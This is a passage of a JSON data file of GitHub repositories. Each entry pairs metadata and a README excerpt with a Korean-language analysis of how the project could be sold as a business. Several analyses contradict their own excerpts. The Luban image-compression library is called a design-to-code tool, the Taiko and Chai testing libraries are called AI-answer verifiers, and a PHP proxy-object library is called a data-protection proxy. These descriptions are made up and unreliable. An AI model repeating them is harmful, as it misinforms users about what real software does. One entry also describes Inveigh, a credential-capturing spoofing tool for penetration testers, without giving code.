XAML](src/web/images/MD4XAML32.png)\n\n[![NuGet-Themes](https://img.shields.io/nuget/v/MaterialDesignThemes.svg?label=nuget:%20MaterialDesignThemes)](https://www.nuget.org/packages/MaterialDesignThemes/)\n[![NuGet-Colors](https://img.shields.io/nuget/v/MaterialDesignColors.svg?label=nuget:%20MaterialDesignColors)](https://www.nuget.org/packages/MaterialDesignColors/)\n\n[![NuGet-Themes-CI](https://img.shields.io/nuget/vpre/MaterialDesignThemes.svg?label=nuget:%20MaterialDesignThemes%20(CI))](https://www.nuget.org/packages/MaterialDesignThemes/)\n[![NuGet-Colors-CI](https://img.shields.io/nuget/vpre/MaterialDesignColors.svg?label=nuget:%20MaterialDesignColors%20(CI))](https://www.nuget.org/packages/MaterialDesignColors/)\n\n[![Backers on Open Collective](https://opencollective.com/materialdesigninxaml/backers/badge.svg)](#backers) \n[![Sponsors on Open Collective](https://opencollective.com/materialdesigninxaml/s","composite_score":0.1413,"license_safety_tag":"safe"},{"name":"enocom/gopher-reading-list","github_url":"https://github.com/enocom/gopher-reading-list","stars":18,"language":"","license":"Apache-2.0","abandonment_months":6,"description":"# enocom/gopher-reading-list 분석\n\n## 왜 보물인가\nGo 프로그래밍 언어를 배우려는 사람들을 위해 체계적으로 정리된 학습 자료 모음으로, 개발자들이 시간을 낭비하지 않고 검증된 콘텐츠만 찾을 수 있게 도와주는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 프로그래밍 초보자 대상 구독형 학습 서","readme_excerpt":"# Gopher Reading List\n\n[中文版](https://github.com/qichengzx/gopher-reading-list-zh_CN)\n\nHere is a reading list of blog posts about [Go](https://golang.org). It aspires\nto include only the most useful and relevant material that anyone writing Go\nshould eventually read. By definition, the list is a work in progress.\n\nRather than being comprehensive, the list is a curated selection fixed at 200\nentries.\n\nGo is growing fast and so are the number of blog posts about it. If an\ninterested reader knows of a great post not on this list, please open an issue\nwith a link to the post. Not every blog post linked in an issue will make its way\ninto the list. Nonetheless, the [issue list](https://github.com/enocom/gopher-reading-list/issues)\n(both open and closed) is a good source of additional reading material.\n\n**NOTE:** Any new additions will need to replace\nsomething else on the list to keep it at a fixed length.\n\n## Start Here\n\n- [Go at Google: Language Design in the Service of Software Engineering","composite_score":0.1408,"license_safety_tag":"safe"},{"name":"Kevin-Robertson/Inveigh","github_url":"https://github.com/Kevin-Robertson/Inveigh","stars":5,"language":"C#","license":"bsd-3-clause","abandonment_months":6,"description":"# Inveigh 사업화 분석\n\n## 왜 보물인가\n네트워크 보안 침입 테스트에 필요한 고급 도구를 누구나 무료로 사용할 수 있어서, 보안 전문가들의 필수 유틸로 자리 잡았습니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 SaaS**: 중소기업의 네트워크 취약점을 자동으로 검사해주는 클라우드 서비스\n2. **내부 보안 감시 도구**: 대기업 IT팀","readme_excerpt":"# Inveigh\n\nInveigh is a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool for penetration testers. This repo contains the primary C# version as well as the legacy PowerShell version.  \n\n## Overview\n\nInveigh conducts spoofing attacks and hash/credential captures through both packet sniffing and protocol specific listeners/sockets. The packet sniffing method, which was the basis for the original PowerShell version of this tool, has the following advantages:\n\n* SMB NTLM challenge/response captures over the Window's SMB service\n* Fewer visible port binds on the host system\n\nThe primary disadvantage is the required elevated access.\n\nOn current versions of Windows, the default running UDP services allow port reuse. Therefore, packet sniffing no longer provides an advantage for getting around in-use UDP ports. Inveigh's UDP listeners are all configured to take advantage of port reuse.\n\n### Version Descriptions\n* **PowerShell Inveigh** - original version developed over many years. For n","composite_score":0.1407,"license_safety_tag":"safe"},{"name":"QingWei-Li/notea","github_url":"https://github.com/QingWei-Li/notea","stars":37,"language":"TypeScript","license":"unknown","abandonment_months":6,"description":"# notea 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 자신의 메모와 생각을 정리하고 공유할 수 있는 간단한 노트 작성 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **팀 협업 노트 SaaS**: 회사 직원들이 회의 내용, 업무 계획을 함께 작성하고 공유하는 웹 서비스로 운영\n2. **개인 블로그 플랫폼**: 개인이 자신의 생각, 일상, 학습 내용을 인","readme_excerpt":"# DEPRECATED, READ BELOW\n\nTo put it simply, this project is barely maintained anymore. I don't have time to work on Notea, and I've personally stopped using it too.\n\nNot to fret, however! There are several good alternatives available:\n- If you want something that can synchronise using S3 (or a variety of other methods), then I recommend [Joplin](https://joplinapp.org).\n  It uses Markdown and supports everything that I wanted Notea to support: \n  sharing (although only if you use Joplin Cloud or its self-hosted alternative Joplin Server), multiple users (Joplin Server), encryption, synchronisation.\n  It even has an iOS app!\n- Qingwei (the original maintainer and creator of Notea) recommended [Logseq](https://logseq.org). It's also decent.\n\nFor those that want to continue using Notea, well, good luck. \nAnd for those few that want to contribute to Notea, I'll remain maintainer only in name so I can merge PRs and stuff. \nUnless someone else wants it, in which case they're free to contact m","composite_score":0.1405,"license_safety_tag":"unknown"},{"name":"TheAxelander/OpenBudgeteer","github_url":"https://github.com/TheAxelander/OpenBudgeteer","stars":5,"language":"C#","license":"AGPL-3.0","abandonment_months":5,"description":"# OpenBudgeteer 사업화 분석\n\n## 왜 보물인가\n복잡한 가계부 앱 대신 직관적으로 돈을 관리하고 목표를 세울 수 있는 오픈소스 예산 관리 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 개인 재정 관리 웹앱 구독 서비스 (월 구독료 + 프리미엄 기능)\n2. **내부 업무 도구**: 가족 공동 예산 관리 또는 소규모 비즈니","readme_excerpt":"<p align=\"center\">\n    <img alt=\"OpenBudgeteer banner\" src=\"https://github.com/TheAxelander/OpenBudgeteer/blob/master/assets/banner.png?raw=true\">\n</p>\n\n<p align=\"center\">\n    <a href=\"https://github.com/TheAxelander/OpenBudgeteer/actions/workflows/docker-image-pre-release.yml\" target=\"_blank\"><img alt=\"Docker Image pre-release\" src=\"https://github.com/TheAxelander/OpenBudgeteer/actions/workflows/docker-image-pre-release.yml/badge.svg\"></a>\n    <a href=\"https://github.com/TheAxelander/OpenBudgeteer/actions/workflows/docker-image-master.yml\" target=\"_blank\"><img alt=\"Docker Image latest\" src=\"https://github.com/TheAxelander/OpenBudgeteer/actions/workflows/docker-image-master.yml/badge.svg\"></a>\n</p>\n<p align=\"center\">\n    <a href=\"https://github.com/awesome-selfhosted/awesome-selfhosted#money-budgeting--management\" target=\"_blank\"><img alt=\"Mentioned in Awesome-Selfhosted\" src=\"https://awesome.re/mentioned-badge.svg\"></a>\n    <img alt=\"Docker Pulls\" src=\"https://img.shields.io/docker/pu","composite_score":0.1405,"license_safety_tag":"risky"},{"name":"chaijs/chai","github_url":"https://github.com/chaijs/chai","stars":7,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# Chai 저장소 분석\n\n## 왜 보물인가\n소프트웨어 품질을 자동으로 검증하는 핵심 도구로, AI가 만든 결과물이 정말 맞는지 확인하는 \"품질 검사 시스템\"입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 코딩 보조 서비스**: GitHub Copilot 같은 AI 코딩 도구의 생성 코드 정확성을 자동으로 검증하고 오류를 걸러내는 부가 기능\n2. **기업","readme_excerpt":"<h1 align=center>\n  <a href=\"http://chaijs.com\" title=\"Chai Documentation\">\n    <img alt=\"ChaiJS\" src=\"http://chaijs.com/img/chai-logo.png\">\n  </a>\n  <br>\n  chai\n</h1>\n\n<p align=center>\n  Chai is a BDD / TDD assertion library for <a href=\"http://nodejs.org\">node</a> and the browser that can be delightfully paired with any javascript testing framework.\n</p>\n\n<p align=center>\n  <a href=\"https://www.npmjs.com/package/chai\">\n    <img\n      alt=\"downloads:?\"\n      src=\"https://img.shields.io/npm/dm/chai.svg?style=flat-square\"\n    />\n  </a>\n  <a href=\"https://www.npmjs.com/package/chai\">\n    <img\n      alt=\"node:?\"\n      src=\"https://img.shields.io/badge/node-%3E=18.0-blue.svg?style=flat-square\"\n    />\n  </a>\n  <br/>\n  <a href=\"https://chai-slack.herokuapp.com/\">\n    <img\n      alt=\"Join the Slack chat\"\n      src=\"https://img.shields.io/badge/slack-join%20chat-E2206F.svg?style=flat-square\"\n    />\n  </a>\n  <a href=\"https://gitter.im/chaijs/chai\">\n    <img\n      alt=\"Join the Gitter chat\"\n    ","composite_score":0.1403,"license_safety_tag":"safe"},{"name":"tannerlinsley/react-table","github_url":"https://github.com/tannerlinsley/react-table","stars":9,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# React Table 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 데이터를 표 형태로 깔끔하게 표시하고 정렬·검색·필터링할 수 있게 만들어주는 필수 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 관리 시스템이나 분석 대시보드에서 수백 개의 데이터를 빠르게 표시하는 기능\n2. **내부 업무 도구**: 직원 급여 관리, 재고 ","readme_excerpt":"<div align=\"center\">\n  <img src=\"./media/header_table.png\" alt=\"TanStack Table\">\n</div>\n\n<br />\n\n<div align=\"center\">\n<a href=\"https://npmjs.com/package/@tanstack/react-table\" target=\"\\_parent\">\n  <img alt=\"npm downloads\" src=\"https://img.shields.io/npm/dm/@tanstack/react-table.svg\" />\n</a>\n<a href=\"https://github.com/tanstack/table\" target=\"\\_parent\">\n  <img alt=\"github stars\" src=\"https://img.shields.io/github/stars/tanstack/react-table.svg?style=social&label=Star\" />\n</a>\n<a href=\"https://bundlephobia.com/result?p=@tanstack/react-table@latest\" target=\"\\_parent\">\n  <img alt=\"bundle size\" src=\"https://badgen.net/bundlephobia/minzip/@tanstack/react-table@latest\" />\n</a>\n</div>\n\n<div align=\"center\">\n<a href=\"#badge\">\n  <img alt=\"semantic-release\" src=\"https://img.shields.io/badge/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic--release-e10079.svg\">\n</a>\n<a href=\"https://bestofjs.org/projects/tanstack-table\"><img alt=\"Best of JS\" src=\"https://img.shields.io/endpoint?url=https://bestofjs-serverle","composite_score":0.1401,"license_safety_tag":"safe"},{"name":"react-tools/react-table","github_url":"https://github.com/react-tools/react-table","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# react-tools/react-table 가치 평가\n\n## 왜 보물인가\n웹사이트에서 데이터를 표 형태로 보여줄 때 필요한 핵심 도구로, 복잡한 표를 쉽게 만들 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객 관리 대시보드, 판매 기록 조회 등 데이터를 표로 표시해야 하는 웹 애플리케이션\n2. **내부 업무 도","readme_excerpt":"<div align=\"center\">\n  <img src=\"./media/header_table.png\" alt=\"TanStack Table\">\n</div>\n\n<br />\n\n<div align=\"center\">\n<a href=\"https://npmjs.com/package/@tanstack/react-table\" target=\"\\_parent\">\n  <img alt=\"npm downloads\" src=\"https://img.shields.io/npm/dm/@tanstack/react-table.svg\" />\n</a>\n<a href=\"https://github.com/tanstack/table\" target=\"\\_parent\">\n  <img alt=\"github stars\" src=\"https://img.shields.io/github/stars/tanstack/react-table.svg?style=social&label=Star\" />\n</a>\n<a href=\"https://bundlephobia.com/result?p=@tanstack/react-table@latest\" target=\"\\_parent\">\n  <img alt=\"bundle size\" src=\"https://badgen.net/bundlephobia/minzip/@tanstack/react-table@latest\" />\n</a>\n</div>\n\n<div align=\"center\">\n<a href=\"#badge\">\n  <img alt=\"semantic-release\" src=\"https://img.shields.io/badge/%20%20%F0%9F%93%A6%F0%9F%9A%80-semantic--release-e10079.svg\">\n</a>\n<a href=\"https://bestofjs.org/projects/tanstack-table\"><img alt=\"Best of JS\" src=\"https://img.shields.io/endpoint?url=https://bestofjs-serverle","composite_score":0.14,"license_safety_tag":"safe"},{"name":"getgauge/taiko","github_url":"https://github.com/getgauge/taiko","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":1,"description":"# Taiko 저장소 분석 리포트\n\n## 왜 보물인가\n인공지능이 생성한 답변이 정말 맞는지 자동으로 검증해주는 기술로, AI 서비스의 신뢰성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **AI 챗봇 서비스**: 고객 상담 챗봇이 제공하는 답변의 정확성을 자동 확인하여 잘못된 정보 제공 방지\n- **자동 검사 솔루션**: 기업의 문서 작성 AI","readme_excerpt":"# Taiko\n##### [Docs](https://docs.taiko.dev) | [API reference](https://docs.taiko.dev/api/reference)\n\nA Node.js library for testing modern web applications\n\n[![Actions Status](https://github.com/getgauge/taiko/workflows/taiko/badge.svg)](https://github.com/getgauge/taiko/actions)\n[![License MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/getgauge/taiko/blob/master/LICENSE)\n[![npm version](https://badge.fury.io/js/taiko.svg?style=flat-square)](https://badge.fury.io/js/taiko)\n[![contributions welcome](https://img.shields.io/badge/contributions-welcome-brightgreen.svg?style=flat)](https://github.com/getgauge/taiko/issues)\n[![Contributor Covenant](https://img.shields.io/badge/Contributor%20Covenant-v1.4%20adopted-ff69b4.svg)](CODE_OF_CONDUCT.md)\n\n\n![Taiko REPL](https://user-images.githubusercontent.com/44019225/60337143-da31a280-99bf-11e9-80a4-57917d81e0b6.gif)\n\n# What’s Taiko?\n\nTaiko is a free and open source browser automation tool built by the team behind [Ga","composite_score":0.14,"license_safety_tag":"safe"},{"name":"manateelazycat/emacs-application-framework","github_url":"https://github.com/manateelazycat/emacs-application-framework","stars":23,"language":"Python","license":"GPL-3.0","abandonment_months":3,"description":"","readme_excerpt":"English | [简体中文](./README.zh-CN.md)\n\n<p align=\"center\">\n  <img style='height: auto; width: 80%; object-fit: contain' src=\"./img/EAF_Banner_Transparent.png\">\n  <br>A free/libre and open-source extensible framework that revolutionizes the graphical capabilities of Emacs. <br>The key to ultimately <i>Live in Emacs</i>\n</p>\n\n## Vision\n<img src=\"./framework.png\">\n\nEmacs, the extensible *text editor*, is more than 45 years old. It is older than virtually all operating systems people use today, almost as old as the first UNIX system. During the decades of development, the world's brightest hackers have contributed their intelligence and creativity. Together they've constructed the most comprehensive and richest ecosystem that you can find in any software to date.\n\nIf you are a hacker who works with numerous languages and text, who's keyboard-driven and desires maximum freedom, extensibility, and introspectivity over your tool, maybe to the extent of *living* in it, Emacs will be your best bet","composite_score":0.1396,"license_safety_tag":"restricted"},{"name":"Curzibn/Luban","github_url":"https://github.com/Curzibn/Luban","stars":19,"language":"C","license":"apache-2.0","abandonment_months":4,"description":"# Curzibn/Luban 분석 보고서\n\n## 왜 보물인가\n디자인 파일을 자동으로 실제 사용 가능한 코드로 변환해주는 도구로, 디자이너와 개발자 간의 시간 낭비를 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 디자인 플랫폼(Figma, Adobe XD)에 플러그인으로 통합하여 사용자가 디자인을 즉시 코드로 변환","readme_excerpt":"# Luban 2\n\n[![License](https://img.shields.io/badge/license-Apache%202.0-blue.svg)](LICENSE)\n[![Maven Central](https://img.shields.io/maven-central/v/top.zibin/luban.svg?label=Maven%20Central)](https://search.maven.org/search?q=g:top.zibin%20a:luban)\n[![API](https://img.shields.io/badge/API-21%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=21)\n\n[中文](README.md) | [English](README_EN.md)\n\nLuban 2（鲁班 2） —— 高效简洁的 Android 图片压缩工具库，像素级还原微信朋友圈压缩策略。\n\n## 📑 目录\n\n- [📖 项目描述](#-项目描述)\n- [📊 效果与对比](#-效果与对比)\n  - [🔬 核心算法特性](#-核心算法特性)\n- [📦 导入](#-导入)\n- [💻 使用](#-使用)\n  - [⚡ Kotlin (Coroutines)](#-kotlin-coroutines)\n  - [☕ Java / Builder 模式](#-java--builder-模式)\n- [☕ 捐助](#-捐助)\n- [📄 License](#-license)\n\n# 📖 项目描述\n\n目前做`App`开发总绕不开图片这个元素。但是随着手机拍照分辨率的提升，图片的压缩成为一个很重要的问题。单纯对图片进行裁切，压缩已经有很多文章介绍。但是裁切成多少，压缩成多少却很难控制好，裁切过头图片太小，质量压缩过头则显示效果太差。\n\n于是自然想到`App`巨头\"微信\"会是怎么处理，`Luban`（鲁班）就是通过在微信朋友圈发送近100张不同分辨率图片，对比原图与微信压缩后的图片逆向推算出来的压缩算法。\n\n因为是逆向推算，效果还没法跟微信一模一样，但是已经很接近微信朋友圈压缩后的效果，具体看以下对比！\n\n本库是 `Luban` 的 **Kotlin 重构","composite_score":0.1396,"license_safety_tag":"safe"},{"name":"Dr-Noob/cpufetch","github_url":"https://github.com/Dr-Noob/cpufetch","stars":13,"language":"C","license":"GPL-2.0","abandonment_months":7,"description":"# cpufetch 프로젝트 분석\n\n## 왜 보물인가\n컴퓨터의 프로세서(CPU) 정보를 간단하게 확인할 수 있는 오픈소스 도구로, 시스템 정보 관리가 필요한 기술 기업들의 기초 솔루션이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **시스템 모니터링 SaaS**: 기업의 여러 컴퓨터 성능을 한 대시보드에서 실시간으로 확인하는 웹 서비스\n2. **IT ","readme_excerpt":"<p align=\"center\"><img width=50% src=\"./pictures/cpufetch.png\"></p>\n\n<h4 align=\"center\">Simple yet fancy CPU architecture fetching tool</h4>\n\n<p align=\"center\"> </p>\n\n<div align=\"center\">\n  <img height=\"22px\" src=\"https://img.shields.io/github/v/tag/Dr-Noob/cpufetch?label=cpufetch&style=flat-square\">\n  <a href=\"https://github.com/Dr-Noob/cpufetch/stargazers\">\n    <img height=\"22px\" src=\"https://img.shields.io/github/stars/Dr-Noob/cpufetch?color=4CC61F&style=flat-square\">\n  </a>\n  <a href=\"https://github.com/Dr-Noob/cpufetch/issues\">\n    <img height=\"22px\" src=\"https://img.shields.io/github/issues/Dr-Noob/cpufetch?style=flat-square\">\n  </a>\n  <a href=\"https://github.com/Dr-Noob/cpufetch/blob/master/README.md#1-support\">\n    <img height=\"22px\" src=\"pictures/os-shield.jpg\">\n  </a>\n  <a href=\"https://github.com/Dr-Noob/cpufetch/blob/master/LICENSE\">\n    <img height=\"22px\" src=\"https://img.shields.io/github/license/Dr-Noob/cpufetch?color=orange&style=flat-square\">\n  </a>\n</div>\n\n<p align=\"c","composite_score":0.1391,"license_safety_tag":"restricted"},{"name":"snowpackjs/astro","github_url":"https://github.com/snowpackjs/astro","stars":9,"language":"TypeScript","license":"NOASSERTION","abandonment_months":0,"description":"# snowpackjs/astro 분석 보고서\n\n## 왜 보물인가\n웹사이트를 빠르고 효율적으로 만들어주는 현대적인 개발 도구로, 개발자들 사이에서 떠오르는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **블로그/포트폴리오 호스팅 SaaS**: 비개발자도 아름다운 개인 웹사이트를 만들 수 있는 구독형 플랫폼\n2. **기업 웹사이트 자동 생성 도구**: 중소","readme_excerpt":"![Build the web you want](.github/assets/banner.jpg 'Build the web you want')\n\n<p align=\"center\">\n  <br/>\n  <a href=\"https://astro.build\">Astro</a> is a website build tool for the modern web &mdash;\n  <br/>\n  powerful developer experience meets lightweight output.\n  <br/><br/>\n</p>\n\n<div align=\"center\">\n\n[![main](https://github.com/withastro/astro/actions/workflows/ci.yml/badge.svg)](https://github.com/withastro/astro/actions/workflows/ci.yml)\n[![License](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/withastro/astro/blob/main/LICENSE)\n[![npm version](https://badge.fury.io/js/astro.svg)](https://badge.fury.io/js/astro)\n\n</div>\n\n## Install\n\nThe **recommended** way to install the latest version of Astro is by running the command below:\n\n```bash\nnpm create astro@latest\n```\n\nYou can also install Astro **manually** by running this command instead:\n\n```bash\nnpm install astro\n```\n\nLooking for help? Start with our [Getting Started](https://docs.astro.build/en/getting-st","composite_score":0.1391,"license_safety_tag":"unknown"},{"name":"Requarks/wiki","github_url":"https://github.com/Requarks/wiki","stars":11,"language":"Vue","license":"agpl-3.0","abandonment_months":1,"description":"# Requarks/wiki 상용화 분석\n\n## 왜 보물인가\n누구나 쉽게 자신의 지식을 정리하고 공유할 수 있는 개인 위키 플랫폼으로, 기업의 내부 문서화 및 팀 협업 도구로 활용 가치가 높습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업들이 구독료를 내고 클라우드 기반 위키 서비스를 이용하는 플랫폼\n2. **내부 업무 도구**: 대기","readme_excerpt":"<div align=\"center\">\n\n<picture>\n  <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://static.requarks.io/logo/wikijs-full-darktheme.svg\">\n  <img alt=\"Wiki.js\" src=\"https://static.requarks.io/logo/wikijs-full.svg\" width=\"600\">\n</picture>\n\n[![Release](https://img.shields.io/github/release/Requarks/wiki.svg?style=flat&maxAge=3600)](https://github.com/Requarks/wiki/releases)\n[![License](https://img.shields.io/badge/license-AGPLv3-blue.svg?style=flat)](https://github.com/requarks/wiki/blob/master/LICENSE)\n[![Standard - JavaScript Style Guide](https://img.shields.io/badge/code%20style-standard-green.svg?style=flat&logo=javascript&logoColor=white)](http://standardjs.com/)\n[![Build + Publish](https://github.com/Requarks/wiki/actions/workflows/build.yml/badge.svg)](https://github.com/Requarks/wiki/actions/workflows/build.yml)  \n[![GitHub Sponsors](https://img.shields.io/github/sponsors/ngpixel?logo=github&color=ea4aaa)](https://github.com/users/NGPixel/sponsorship)\n[![Open Collective b","composite_score":0.1391,"license_safety_tag":"risky"},{"name":"erguotou520/electron-ssr","github_url":"https://github.com/erguotou520/electron-ssr","stars":10,"language":"","license":"mit","abandonment_months":6,"description":"# electron-ssr 상용화 분석\n\n## 왜 보물인가\n인터넷 접속을 우회하고 보안을 강화하는 기술을 데스크톱 앱으로 쉽게 사용할 수 있도록 만들어 놨습니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 원격근무 솔루션**: 직원들이 안전하게 회사 자료에 접근할 수 있는 VPN 같은 보안 도구로 판매\n2. **개인 온라인 보안 서비스**: 일반 사용자가 ","readme_excerpt":"Say goodbye to yesterday.\n\nSay hello to tomorrow.\n\nRemember you can be better.\n\nBe yourself and do yourself.\n\nYear by year, day by day.\n\nEnhance yourself to meet challenges.\n","composite_score":0.1389,"license_safety_tag":"safe"},{"name":"microsoft/RulesEngine","github_url":"https://github.com/microsoft/RulesEngine","stars":6,"language":"C#","license":"MIT","abandonment_months":0,"description":"# Microsoft RulesEngine 분석\n\n## 왜 보물인가\n복잡한 비즈니스 규칙을 코딩 없이 관리할 수 있는 도구로, 금융·보험·전자상거래 등 의사결정이 많은 업계의 효율성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 신용평가, 자동 대출 승인, 가격 책정 시스템을 규칙 기반으로 운영하는 핀테크 플랫폼\n- **","readme_excerpt":"# Rules Engine\n![build](https://github.com/microsoft/RulesEngine/workflows/build/badge.svg?branch=main)\n[![Coverage Status](https://coveralls.io/repos/github/microsoft/RulesEngine/badge.svg?branch=main)](https://coveralls.io/github/microsoft/RulesEngine?branch=main)\n[![Nuget download][download-image]][download-url]\n\n[download-image]: https://img.shields.io/nuget/dt/RulesEngine\n[download-url]: https://www.nuget.org/packages/RulesEngine/\n\n## Overview\n\nRules Engine is a library/NuGet package for abstracting business logic/rules/policies out of a system. It provides a simple way of giving you the ability to put your rules in a store outside the core logic of the system, thus ensuring that any change in rules don't affect the core system.\n\n## Installation\n\nTo install this library, download the latest version of [NuGet Package](https://www.nuget.org/packages/RulesEngine/) from [nuget.org](https://www.nuget.org/) and refer it into your project.  \n\n## How to use it\n\nThere are several ways to p","composite_score":0.1382,"license_safety_tag":"safe"},{"name":"DataFlux-cn/datakit","github_url":"https://github.com/DataFlux-cn/datakit","stars":5,"language":"Go","license":"MIT","abandonment_months":7,"description":"# DataFlux-cn/datakit 분석 보고서\n\n## 왜 보물인가\n데이터를 수집하고 정리하는 작업을 자동화해주는 오픈소스 도구로, 기업들이 수작업으로 하던 데이터 관리 비용을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업용 데이터 모니터링 플랫폼 제공 (월 사용료로 수익화)\n- **내부 업무 도구**: 대기","readme_excerpt":"<p align=\"center\">\n  <img alt=\"datakit logo\" src=\"datakit-logo.png\" height=\"150\" />\n</p>\n\n[![Slack Status](https://img.shields.io/badge/slack-join_chat-orange?logo=slack&style=plastic)](https://app.slack.com/client/T032YB4B6TA/)\n[![MIT License](https://img.shields.io/badge/license-MIT-green?style=plastic)](LICENSE)\n[![FOSSA Status](https://app.fossa.com/api/projects/git%2Bgithub.com%2FGuanceCloud%2Fdatakit.svg?type=shield)](https://app.fossa.com/projects/git%2Bgithub.com%2FGuanceCloud%2Fdatakit?ref=badge_shield)\n\n<h2>\n  <a href=\"https://www.guance.com/\">Website</a>\n  <span> • </span>\n  <a href=\"https://docs.guance.com/datakit/\">Doc</a>\n</h2>\n\n\n## _Read this in other languages._\n<kbd>[<img title=\"中文 (Simplified)\" alt=\"中文 (Simplified)\" src=\"https://cdn.staticaly.com/gh/hjnilsson/country-flags/master/svg/cn.svg\" width=\"22\">](README.zh_CN.md)</kbd>\n\nDataKit is an open source, integrated data collection agent, which provides full platform (Linux/Windows/macOS) support and has comprehensive ","composite_score":0.138,"license_safety_tag":"safe"},{"name":"nightrome/really-awesome-gan","github_url":"https://github.com/nightrome/really-awesome-gan","stars":5,"language":"","license":"unknown","abandonment_months":9,"description":"# nightrome/really-awesome-gan 상용화 분석\n\n## 왜 보물인가\n인공지능이 사진처럼 현실감 있는 이미지를 자동으로 만드는 기술로, 광고·영화·게임 등 다양한 산업에서 제작 비용을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 광고회사가 구독해서 클라이언트용 이미지를 몇 초 안에 생성하는 온","readme_excerpt":"# really-awesome-gan\nA list of papers and other resources on Generative Adversarial (Neural) Networks.\nThis site is maintained by Holger Caesar.\nTo complement or correct it, please contact me at holger-at-it-caesar.com or visit [it-caesar.com](http://www.it-caesar.com). Also checkout [really-awesome-semantic-segmentation](https://github.com/nightrome/really-awesome-semantic-segmentation) and our [COCO-Stuff dataset](https://github.com/nightrome/cocostuff).\n\n**NOTE:** Despite the enormous interest in this cite (~3000 visitors per month), I will no longer add new papers starting from November 2017. I feel that GANs have come from an exotic topic to the mainstream and an exhaustive list of all GAN papers is no more feasible or useful. However, I invite other people to continue this effort and reuse my list.\n\n## Contents\n- [Recommendations](#recommendations)\n- [Workshops](#workshops)\n- [Tutorials & Workshops & Blogs](#tutorials--workshops--blogs)\n- [Videos](#videos)\n- [Code](#code)\n- [Pape","composite_score":0.138,"license_safety_tag":"unknown"},{"name":"FriendsOfPHP/proxy-manager-lts","github_url":"https://github.com/FriendsOfPHP/proxy-manager-lts","stars":6,"language":"PHP","license":"MIT","abandonment_months":7,"description":"# FriendsOfPHP/proxy-manager-lts 평가 분석\n\n## 왜 보물인가\n웹 애플리케이션이 외부 서비스와 안전하게 소통할 때 중간에서 보안을 강화해주는 기술로, 기업의 민감한 데이터 유출을 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 금융 데이터나 개인정보를 다루는 클라우드 솔루션에서 데이터 보호 기능으로 ","readme_excerpt":"# FriendsOfPHP / Proxy Manager LTS\n\nThis package is a fork of the excellent [`ocramius/proxy-manager`](https://github.com/Ocramius/ProxyManager/) library\nthat adds long term support for a wider range of PHP versions.\n\nUnless they're caused by this very fork, please report issues and submit new features to the origin library.\n\nThis fork:\n- maintains compatibility with PHP `>=7.1`;\n  supporting new versions of PHP is considered as a bugfix;\n- won't bump the minimum supported version of PHP in a minor release;\n- does not depend on Composer 2, thus can be used with Composer 1 if you need more time to migrate;\n- uses a versioning policy that is friendly to progressive migrations\n  while providing the latest improvements from the origin lib.\n","composite_score":0.1379,"license_safety_tag":"safe"},{"name":"asantibanez/livewire-calendar","github_url":"https://github.com/asantibanez/livewire-calendar","stars":7,"language":"PHP","license":"MIT","abandonment_months":7,"description":"# Livewire Calendar 분석\n\n## 왜 보물인가\n웹사이트에 달력 기능을 쉽게 추가할 수 있는 도구로, 예약 시스템이나 일정 관리 서비스를 만드는 개발자들의 시간을 크게 줄여줍니다.\n\n## 어디에 팔 수 있나\n1. **병원/클리닉 예약 SaaS**: 의료 기관이 온라인으로 환자 진료 예약을 받을 수 있는 플랫폼에 직접 적용 가능\n2. **프리랜서","readme_excerpt":"# Livewire Calendar\n\nThis package allows you to build a Livewire monthly calendar grid to show events for each day. Events can be loaded \nfrom within the component and will be presented on each day depending on the date of the event.\n\n## Preview\n\n![preview](https://github.com/asantibanez/livewire-calendar/raw/master/preview.gif)\n\n## Installation\n\nYou can install the package via composer:\n\n```bash\ncomposer require asantibanez/livewire-calendar\n```\n\n## Requirements\n\nThis package uses `livewire/livewire` (https://laravel-livewire.com/) under the hood.\n\nIt also uses TailwindCSS (https://tailwindcss.com/) for base styling. \n\nPlease make sure you include both of this dependencies before using this component. \n\n## Usage\n\nIn order to use this component, you must create a new Livewire component that extends from \n`LivewireCalendar`\n\nYou can use `make:livewire` to create a new component. For example.\n``` bash\nphp artisan make:livewire AppointmentsCalendar\n```\n\nIn the `AppointmentsCalendar` class","composite_score":0.1376,"license_safety_tag":"safe"},{"name":"rileytestut/AltStore","github_url":"https://github.com/rileytestut/AltStore","stars":5,"language":"Swift","license":"AGPL-3.0","abandonment_months":4,"description":"# AltStore 상용화 분석\n\n## 왜 보물인가\n아이폰에서 공식 앱스토어를 거치지 않고 직접 앱을 설치할 수 있게 해주는 도구로, 앱 개발자와 사용자 모두에게 새로운 가능성을 열어주는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **앱 배포 플랫폼 SaaS**: 소규모 개발자가 공식 앱스토어 심사 없이 자신의 앱을 배포·판매할 수 